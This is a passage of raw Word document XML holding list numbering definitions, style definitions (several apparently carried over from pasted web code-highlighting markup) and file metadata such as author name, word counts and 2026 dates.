    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BE21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1785C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6DC821AE"/>
    <w:lvl w:ilvl="0" w:tplc="86027B8A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BAEC616E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="1C680744" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="28A6F630" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="14403C38" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A948B792" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DE90C180" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="CC985848" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="3ACE490A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6480"/>
        </w:tabs>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1285692854">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1736665421">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2069382382">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1924025531">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1789012373">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1179731559">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="87193407">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1035426020">
    <w:abstractNumId w:val="10"/>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241015780">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="444889832">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="666977911">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2040691952">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="95104165">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="450713420">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076978321">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1599680455">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="877396642">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="307902078">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="688410816">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1102460379">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1691880819">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1194686159">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1207524314">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1683777435">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1822649477">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="11382579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66A7"/>
    <w:rsid w:val="0062523B"/>
    <w:rsid w:val="007E5F9C"/>
    <w:rsid w:val="00D366A7"/>
    <w:rsid w:val="00F15A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666FD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{437986BE-5C40-43D3-8022-F08BF31A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66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366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366A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66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366A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366A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366A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366A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366A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66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366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366A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66A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D366A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D366A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366A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366A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366A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366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66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66A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66A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366A7"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00D366A7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D366A7"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00D366A7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00D366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66A7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00D366A7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00D366A7"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D366A7"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D366A7"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="math-inline">
    <w:name w:val="math-inline"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ng-tns-c3541298173-293">
    <w:name w:val="ng-tns-c3541298173-293"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mat-mdc-button-persistent-ripple">
    <w:name w:val="mat-mdc-button-persistent-ripple"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mat-focus-indicator">
    <w:name w:val="mat-focus-indicator"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mat-mdc-button-touch-target">
    <w:name w:val="mat-mdc-button-touch-target"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D366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66A7"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ng-tns-c3541298173-294">
    <w:name w:val="ng-tns-c3541298173-294"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta">
    <w:name w:val="hljs-meta"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta-keyword">
    <w:name w:val="hljs-meta-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-tag">
    <w:name w:val="hljs-tag"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-name">
    <w:name w:val="hljs-name"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attr">
    <w:name w:val="hljs-attr"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="css">
    <w:name w:val="css"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-selector-class">
    <w:name w:val="hljs-selector-class"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attribute">
    <w:name w:val="hljs-attribute"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="javascript">
    <w:name w:val="javascript"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-function">
    <w:name w:val="hljs-function"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ng-tns-c3541298173-295">
    <w:name w:val="ng-tns-c3541298173-295"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ng-tns-c3541298173-296">
    <w:name w:val="ng-tns-c3541298173-296"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-selector-tag">
    <w:name w:val="hljs-selector-tag"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ng-tns-c3541298173-297">
    <w:name w:val="ng-tns-c3541298173-297"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ng-tns-c3541298173-298">
    <w:name w:val="ng-tns-c3541298173-298"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-subst">
    <w:name w:val="hljs-subst"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ng-tns-c3541298173-299">
    <w:name w:val="ng-tns-c3541298173-299"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ng-tns-c3541298173-300">
    <w:name w:val="ng-tns-c3541298173-300"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ng-tns-c3541298173-301">
    <w:name w:val="ng-tns-c3541298173-301"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ng-tns-c3541298173-302">
    <w:name w:val="ng-tns-c3541298173-302"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ng-tns-c3541298173-303">
    <w:name w:val="ng-tns-c3541298173-303"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-literal">
    <w:name w:val="hljs-literal"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D366A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6730</Words>
  <Characters>38365</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>319</Lines>
  <Paragraphs>90</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>45005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Sói MT</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sói MT</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-27T06:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-27T06:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>